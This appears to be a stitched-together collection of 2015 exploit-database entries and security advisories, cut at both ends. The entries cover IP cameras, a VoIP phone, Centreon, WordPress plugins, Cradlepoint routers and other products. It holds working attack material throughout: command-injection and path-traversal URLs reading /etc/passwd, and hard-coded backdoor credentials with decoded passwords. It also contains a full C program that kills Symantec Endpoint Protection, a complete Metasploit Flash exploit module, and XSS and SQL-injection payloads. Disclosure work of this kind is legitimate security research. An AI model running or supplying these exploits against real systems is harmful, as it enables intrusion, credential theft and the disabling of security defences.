http://<Camera-IP>:8080/cgi_test.cgi?write_tan&;ls&ls%20-la
PoC Output:
Write MAC address, model name, hw version, sn, tan, pid,firmware version
-c => set system MAC address
-m [MAC] => write MAC address
-n [Model Name] => write Model Name
-h [HW Version] => write HW Version
-v [Firmware Version] => write Firmware Version
-s [SN] => write SN
-t [TAN] => write TAN
-d [PID] => write PID
-r [CR] => write Country Region
-p => show current info.
Content-type: text/html
<body>WRITE_TAN OK, PID=;ls&ls%20-
</body></html>3g.htm
485.htm
SStreamVideo.cab
ado.htm
cfgupgrade.cgi
cgi_test.cgi
client.htm
default.htm
default_else.htm
default_ie.htm
default_m.htm
default_nets.htm
[...]
7.2. OS Command Injection in AirLive WL-2000CAM's wireless_mft.cgi binary file
[CVE-2014-8389] The AirLive WL-2000CAM anf POE-200CAM "/cgi-bin/mft/wireless_mft.cgi" binary file, has an OS command injection in the parameter ap that can be exploited using the hard-coded credentials the embedded Boa web server has inside its configuration file:
username: manufacture
password: erutcafunam
The following proof of concept copies the file where the user credentials are stored in the web server root directory:
<a href="http://<Camera-IP>/cgi-bin/mft/wireless_mft?ap=testname;cp%20/var/www/secret.passwd%20/web/html/credentials">http://<Camera-IP>/cgi-bin/mft/wireless_mft?ap=testname;cp%20/var/www/...</a>
Afterwards, the user credentials can be obtained by requesting:
<a href="http://<Camera-IP>/credentials">http://<Camera-IP>/credentials</a>
The credentials are encoded in a string using Base64, therefore it is easy to decode them and have complete access to the device.
8. Report Timeline
2015-05-04: Core Security sent an initial email notification to AirLive. Publication date set to Jun 8, 2015.
2015-05-07: Core Security sent another email notification to AirLive.
2015-05-14: Core Security attempted to contact AirLive through Twitter.
2015-05-20: Core Security attempted to contact AirLive through Twitter again.
2015-06-16: Core Security sent another email and Twitter notification to AirLive.
2015-06-18: Core Security sent an email to Airlive explaining that this was their last opportunity to reply, if not the advisory was going to be published on June 23, 2015.
2015-07-06: Advisory CORE-2015-0012 published.
9. References
[1] http://www.airlive.com.
[2] http://www.airlive.com/product/BU-2015.
[3] http://www.airlive.com/product/MD-3025.
[4] http://www.airlive.com/product/BU-3026.
[5] http://www.airlivecam.eu/manualy/ip_kamery/WL-2000CAM.pdf.
[6] http://www.airlivesecurity.com/product.php?id=5#.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
The Grandstream GXV3275 is an Android-based VoIP phone. Several
vulnerabilities were found affecting this device.
* The device ships with a default root SSH key, which could be used as a
backdoor:
/system/root/.ssh # cat authorized_keys
Public key portion is:
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAAAgwCIcYbgmdHTpTeDcBA4IOg5Z7d2By0GXGihZzcTxZC+YTWGUe/HJc+pYDpDrGMWg0hMqd+JPs1GaLNw4pw0Mip6VMT7VjoZ8Z+n2ULNyK1IoTU4C3Ea4vcYVR8804Pvh9vXxC0iuMEr1Jx7SewUwSlABX04uVpEObgnUhpi+hn/H34/
jhzhao@jhzhao-Lenovo
Fingerprint: md5 7b:6e:a0:00:19:54:a6:39:84:1f:f9:18:2e:79:61:b5
This issue has not been resolved.
* The SSH interface only provides access to a limited CLI. The CLI's ping
and traceroute commands will pass user input as parameters to underlying
system commands without escaping shell metacharacters. This can be
exploited to break out to a shell:
GXV3275 > traceroute $(sh)
This shell will only see stderr, so we then need to run sh with stdout
redirected to stderr:
sh 1>&2
This issue has been resolved in firmware version 1.0.3.30.
* The web interface exposes an undocumented command execution API:
http://DEVICEIP/manager?action=execcmd&command=echo%20%22hello%22%20%3E%20/system/root/test.txt
This issue has been resolved in firmware version 1.0.3.30.
* The web interface allows unprivileged users to escalate privileges by
modifying a cookie on the client side:
javascript:void(document.cookie="type=admin")
Full details are available here:
http://davidjorm.blogspot.com/2015/07/101-ways-to-pwn-phone.html
MITRE was contacted repeatedly requesting CVE names for these issues, but
never replied.
David
Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution
CVEs: CVE-2015-1560, CVE-2015-1561
Vendor: Merethis - www.centreon.com
Product: Centreon
Version affected: 2.5.4 and prior
Product description:
Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/)
Advisory introduction:
Centron 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution.
Credit: Huy-Ngoc DAU of Deloitte Conseil, France
================================
Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560)
================================
Vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which unsanitized "sid" GET parameter is used in a SQL request.
PoC:
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si
d=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si
d=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27
By exploiting CVE-2015-1560, an attacker can obtain among others a valid session_id, which is required to exploit CVE-2015-1561.
================================
Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561)
================================
$command_line variable, which is passed to popen function, is constructed using unsanitized GET parameters.
PoC (a valid session_id value is required):
- Reading /etc/passwd by injecting command into "ns_id" parameter:
http://example.domain/centreon/include/Administration/corePerformance/ge
tStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=t
oday&session_id=[valid session_id]
- Injecting "uname ?a" into "end" parameter:
http://example.domain/centreon/include/Administration/corePerformance/ge
tStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+%
23&session_id=[valid session_id]
Combining two vulnerabilities, an unauthenticated attacker can take control of the web server.
================================
Timeline
================================
26/01/2015 - Vulnerabilities discovered
29/01/2015 - Vendor notified
05/02/2015 - Vendor fixed SQLi
13/02/2015 - Vendor fixed RCE
References
Vendor fixes:
- SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21
3b9c60de1bad0b464fd6403c828cf12582
- Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21
3b9c60de1bad0b464fd6403c828cf12582
About Deloitte:
Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. In France, Deloitte SAS is the member firm of Deloitte Touche Tohmatsu Limited, and professional services are provided by its subsidiaries and affiliates.
Our Enterprise Risk Services practice is made up of over 11,000 professionals providing services relating to security, privacy & resilience; data governance and analytics; information and controls assurance; risk management technologies; and technology risk & governance. We help organizations build value by taking a "Risk Intelligent" approach to managing financial, technology, and business risks.
Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.
Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded.
1 <?php
2 require_once("../../../../wp-admin/admin.php");
3
4 header('Content-disposition: attachment; filename='.$_GET['filename']);
5 header('Content-type: application/pdf');
6 readfile(HAET_INVOICE_PATH.$_GET['filename']);
7 ?>
You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with path.
CVEID: Requested TBD
OSVDB: TBD
Exploit Code:
• $ curl http://server/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd
# Title: Immunity Debugger - Crash
# Date: 08/07/2015
# Author: Arsyntex
# Vendor Homepage: http://www.immunityinc.com/products/debugger/
# Version: v1.85
# Tested on: Windows 8.1 Pro
Incorrect path/file EXtEnsion parsing.
-Create folder with the name: .exe.exe and put any program inside and try debug it.
-Try to debug an executable with the name: test.exe.exe or lib.exe.dll
The "OpenEXEfile" function does not check if the return value of strchr() is zero.
----------------------------------------------------------------------------------
loc_4B8182:
mov [esp+10h+var_10], edi
add edi, 4
mov [esp+10h+var_C], 20h
mov [esp+10h+arg_24], eax
call strchr ; return EAX= 0
mov [esp+10h+var_10], eax
mov [esp+10h+arg_28], eax ; (!)
call strlen ; ntdll.strlen(s)
---------------------------------------------------------------------
ntdll.strlen(s) - NULL parameter
---------------------------------------------------------------------
ntdll_strlen:
mov ecx, [esp+4] ; [esp+4] = 0 NULL pointer
test ecx, 3 ; ...
jz short loc_77C77510 ; jump
...
loc_77C77510:
mov eax, [ecx] ; Access Violation
---------------------------------------------------------------------
1. Advisory Information
Title: AirLink101 SkyIPCam1620W OS Command Injection
Advisory ID: CORE-2015-0011
Advisory URL: http://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injection
Date published: 2015-07-08
Date of last update: 2015-07-08
Vendors contacted: AirLink101
Release mode: User release
2. Vulnerability Information
Class: OS Command Injection [CWE-78], Use of Hard-coded Credentials" [CWE-798]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2280
3. Vulnerability Description
AirLink101 [2] SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera streams supreme quality MPEG4 and MJPEG image. It supports remote surveillance on computers over the Internet or on mobile handheld devices.
The SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera [1] is vulnerable to an OS Command Injection Vulnerability in the snwrite.cgi binary.
4. Vulnerable Packages
AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck (Aug. 2012)
Other devices based on the same firmware are probably affected too, but they were not tested.
5. Vendor Information, Solutions and Workarounds
Core Security recommends applying a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation.
Contact the vendor for further information.
6. Credits
This vulnerability was discovered and researched by Nahuel Riva from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from the Core Security Advisories Team.
7. Technical Description / Proof of Concept Code
7.1. OS Command Injection in CGI binary file
[CVE-2015-2280] The snwrite.cgi binary has an OS Command Injection at function loc_8928 when handling the "mac" parameter:
.text:00008928
.text:00008928 loc_8928
.text:00008928 BL memset
.text:0000892C LDR R3, [R7,#0x40]
.text:00008930 LDR R2, =stderr
.text:00008934 ADD R3, R5, R3
.text:00008938 LDR R0, [R2] ; stream
.text:0000893C LDR R1, =aMacS ; "mac = %s"
.text:00008940 LDR R2, [R3,#0x104]
.text:00008944 BL fprintf
.text:00008948 LDR R2, [R7,#0x40]
.text:0000894C ADD R2, R5, R2
.text:00008950 LDR R3, [R2,#0x104]
.text:00008954 MOV R1, #0x80 ; maxlen
.text:00008958 LDR R2, =aEtcInit_dMacwr ; "/etc/init.d/macwrite.sh %s 1>/dev/null "...
.text:0000895C MOV R0, R8 ; s
.text:00008960 BL snprintf
.text:00008964 MOV R0, R8 ; command
.text:00008968 BL system
.text:0000896C LDR R4, [R7,#0x40]
.text:00008970 B loc_8908
.text:00008970 ; End of function sub_88A8
.text:00008970
The "mac" parameter is used in a printf() call to build a command to execute the macwrite.sh shell script to update the MAC Address configuration. The printf() built string is then used in a system() call. Therefore, it is possible to inject arbitrary commands just by putting a ";" after the "mac" parameter, for example:
http://<Camera_IP>/maker/snwrite.cgi?mac=1234;ps
In order to invoke the snwrite.cgi binary valid credentials are required, but a backdoor account located in /server/usr.ini can be used:
nriva@fastix:/mnt/firmware/server$ cat usr.ini
admin=Basic YWRtaW46YWRtaW4=
maker=Basic cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl
These accounts are encoded in base64 so it is relatively easy to recover them:
>>> "YWRtaW46YWRtaW4=".decode("base64")
'admin:admin'
>>> "cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl".decode("base64")
'productmaker:ftvsbannedcode'
Using the 'productmaker:ftvsbannedcode' backdoor account allows access to the path /maker/snwrite.cgi and therefore the ability to perform the injection explained above.
8. Report Timeline
2015-05-04: Core Security sent an initial email notification to AirLink101. Publication date set to June 8, 2015.
2015-05-07: Core Security sent another email notification to AirLink101.
2015-05-14: Core Security attempted to contact AirLink101 through Twitter.
2015-05-14: Core Security sent yet another email notification to AirLink101.
2015-05-14: AirLink101 replied with a direct Twitter message asking Core to resend the email.
2015-05-14: Core Security informed AirLink101 through Twitter that they resent the email.
2015-05-15: Core Security asked AirLink101 through Twitter if they were able to find the email they sent.
2015-05-18: Core Security again asked AirLink101 through Twitter if they received the email.
2015-05-19: AirLink101 replied to Core on Twitter saying that they received the email and were reviewing the situation.
2015-05-20: Core Security replied AirLink101 with a direct Twitter message stating that they needed their reply soon in order to coordinate the advisory publication.
2015-05-21: AirLink101 wrote an email requesting that Core share the model and the issue they found, and requesting a contact phone number.
2015-05-22: Core Security replied to AirLink101 by email and asked if they had a PGP key or if they preferred the report to be sent in plain text. Additionally, Core informed AirLink101 that it is their policy to communicate exclusively via email in order to keep a record.
2015-05-22: AirLink101 replied by email and asked when the advisory would be published without answering the previous question (PGP or plain text) and asked again for a contact phone number.
2015-05-26: Core Security replied to AirLink101 by email clarifying that they previously requested their input on whether they would prefer to receive the information encrypted or in plain text, and explained again that it is their policy to communicate using email.
2015-05-28: Core Security asked AirLink101 by email if they received their previous message.
2015-06-04: Core Security again asked AirLink101 if they were receiving their emails. They informed Airlink101 that if they didn't receive an answer soon they would be forced to publish their findings as a user release.
2015-06-16: Core Security informed AirLink101 that if they didn't receive an answer that week they would be forced to publish their findings.
2015-06-18: Core Security informed AirLink101 that it was their last chance to answer their emails, if not the advisory was going to be published on June 23, 2015.
2015-07-08: Advisory CORE-2015-0011 published.
9. References
[1] http://airlink101.com/products/aic1620w.php.
[2] http://www.airlink101.com/.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
# Exploit Title: Antivirus
# Google Dork: intitle: Antivirus
# Date: 2015-07-07
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: www.symantec.com
# Software Link: www.symantec.com/endpoint-protection
# Version:12.1.4013
# Tested on: windows 7 SP1
# Category: Antivirus
Vendor:
================================
Symantec ( www.symantec.com )
Product:
================================
Symantec EP 12.1.4013
Advisory Information:
================================================
Disabling Vulnerability
Vulnerability Details:
=====================
Symantec EP agent & services can be rendered useless even after globally
locking
down endpoint protection via a Symantec central management server and
enabling
globally managed password protection controls. Tested successfully on
Windows 7 SP1 result may vary OS to OS.
Exploit code(s):
===============
#include <windows.h>
#include <Tlhelp32.h>
#define SMC_EXE "Smc.exe"
#define SMC_GUI "SmcGui.exe"
#define CC_SVC_HST "ccSvcHst.exe"
/*
By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org
Symantec Endpoint Protection version 12.1.4013
First reported to Symantec - Jan 20, 2015
Goal:
Kill Symantec EP agent & services after globally locking down endpoint
protection via the
Symantec central management server and enabling globally managed password
protection controls. Tested successfully on Windows 7 SP1 result may vary
OS to OS.
Scenario:
Run the from browser upon download or save to some directory and run
Not the most elegant code and I don't care...
*/
void el_crookedio_crosso(const char *victimo){
HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
PROCESSENTRY32 pEntry;
pEntry.dwSize=sizeof(pEntry);
BOOL hRes=Process32First(hSnapShot,&pEntry);
while(hRes){
if(strcmp(pEntry.szExeFile,victimo)==0){
HANDLE
hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID);
if (hProcess!=NULL){
TerminateProcess(hProcess,9);
CloseHandle(hProcess);
}
}
hRes=Process32Next(hSnapShot,&pEntry);
}
CloseHandle(hSnapShot);
}
DWORD exeo_de_pid(char *ghostofsin){
DWORD ret=0;
PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)};
HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (hProcSnap==INVALID_HANDLE_VALUE) return 0;
if (Process32First (hProcSnap,&pe32))
do
if (!strcmp(pe32.szExeFile,ghostofsin)) {
ret=pe32.th32ProcessID;
break;
}
while (Process32Next (hProcSnap,&pe32));
CloseHandle (hProcSnap);
return ret;
}
void angelo_maliciouso(){
int AV=exeo_de_pid(SMC_EXE);
char id[8];
sprintf(id, "%d ", AV);
printf("%s", id);
char cmd[50]="Taskkill /F /PID ";
strcat(cmd, id);
system(cmd);
// system("Taskkill /F /IM Smc.exe"); //Access denied.
system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint
Protection\\Smc.exe\" -disable -ntp");
Sleep(1000);
el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);
}
int main(void){
puts("/*-----------------------------------------------------------*/\n");
puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013
|\n");
puts("| By hyp3rlinx - Jan 2015
|\n");
puts("/*------------------------------------------------------------*/\n");
SetDebugPrivileges();
angelo_maliciouso();
Sleep(1000);
el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);
Sleep(2000);
angelo_maliciouso();
Sleep(6000);
return 0;
}
int SetDebugPrivileges(){
DWORD err=0;
TOKEN_PRIVILEGES Debug_Privileges;
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return
GetLastError();
HANDLE hToken=0;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){
err=GetLastError();
if(hToken)CloseHandle(hToken);
return err;
}
Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
Debug_Privileges.PrivilegeCount=1;
if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){
err=GetLastError();
if(hToken) CloseHandle(hToken);
}
return err;
}
Disclosure Timeline:
=========================================================
Vendor Notification: Jan 20, 2015
July 7, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==================================================================
Request Method(s): [+] Click
Vulnerable Product: [+] Symantec Endpoint Protection version
12.1.4013
Vulnerable Parameter(s): [+] N/A
Affected Area(s): [+] Smc.exe, SmcGui.exe & ccSvcHst.exe
======================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
(hyp3rlinx)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ByteArray Use After Free',
'Description' => %q{
This module exploits an use after free on Adobe Flash Player. The vulnerability,
discovered by Hacking Team and made public on its July 2015 data leak, was
described as an Use After Free while handling ByteArray objects. This module has
been tested successfully on:
Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Someone from HackingTeam
'juan vazquez' # msf module
],
'References' =>
[
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81 ||
os =~ OperatingSystems::Match::WINDOWS_VISTA ||
os =~ OperatingSystems::Match::WINDOWS_XP
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
# Note: Chrome might be vague about the version.
# Instead of 18.0.0.203, it just says 18.0
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 06 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
# Exploit Title: Cradlepoint MBR LFI
# Date: 7/7/2015
# Exploit Author: Doc_Hak
# Vendor Homepage: https://cradlepoint.com/
# Version: 1200/1400 (REQUIRED)
# Tested on: Embedded linux
I found a local file include with root level permissions on
cradlepoint routers. So far looks like it works on MBR1400 and MBR1200
routers, though others could be affected. I say it is with root level
because it can read /etc/passwd and there is no "x" indicating the hash is
stored in the /etc/shadow file. Therefore the root hash is included in
this file.
To access the root hash on Cradlepoint MBRs simply:
curl http://192.168.1.1/../../../../../../../../../../../../etc/passwd
source: https://www.securityfocus.com/bid/54635/info
The chenpress plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
http://www.example.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
source: https://www.securityfocus.com/bid/54620/info
CodeIgniter is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass XSS filter protections and perform cross-site scripting attacks.
CodeIgniter versions prior to 2.1.2 are vulnerable.
Build an application on CodeIgniter 2.1.0:
// application/controllers/xssdemo.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
class Xssdemo extends CI_Controller {
public function index() {
$data['xss'] =
$this->security->xss_clean($this->input->post('xss'));
$this->load->view('xssdemo', $data);
}
}
// application/views/xssdemo.php
<form method=post>
<textarea name=xss><?php echo htmlspecialchars($xss);
?></textarea>
<input type=submit />
</form>
<p>XSS:
<hr />
<?php echo $xss ?>
Launch http://app-uri/index.php/xssdemo and try above vectors.
source: https://www.securityfocus.com/bid/54613/info
Maian Survey is prone to a URI-redirection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to execute arbitrary local files within the context of the webserver process or redirect users to a potentially malicious site. This may aid in phishing attacks or allow the attacker to compromise the application; other attacks are also possible.
Maian Survey 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/[PATH]/admin/index.php?cmd=LF�°_here
source: https://www.securityfocus.com/bid/54467/info
Rama Zeiten CMS is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.
Rama Zeiten CMS 0.99 is vulnerable; other versions may also be affected.
http://www.example.com/ramazeiten/download.php?file=../../../../../etc/passwd
source: https://www.securityfocus.com/bid/54591/info
AVA VoIP is prone to multiple security vulnerabilities because the application fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, upload and execute arbitrary files in the context of the web server, and launch other attacks.
AVA VoIP 1.5.12 is vulnerable; other versions may also be affected.
http://www.example.com/agent_accounts_report.php?agent_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/tariff_add.php?tariff_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/routeset_set.php?routeset_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
source: https://www.securityfocus.com/bid/54470/info
EmbryoCore CMS is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.
EmbryoCore 1.03 is vulnerable; other versions may also be affected.
http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=./configuration.php%00
http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=../../../../../../etc/passwd%00
http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=../../../../../../etc/passwd%00
http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=./configuration.php%00
source: https://www.securityfocus.com/bid/54466/info
web@all is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
web@all 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/webatall-2.0/my/kindeditor/?name=%3Cscript%3Ealert%28123%29%3C/script%3E
source: https://www.securityfocus.com/bid/54459/info
The Post Recommendations plug-in for WordPress is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Post Recommendations 1.1.2 is vulnerable; other versions may also be affected.
PostShell.php
<?php
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php");
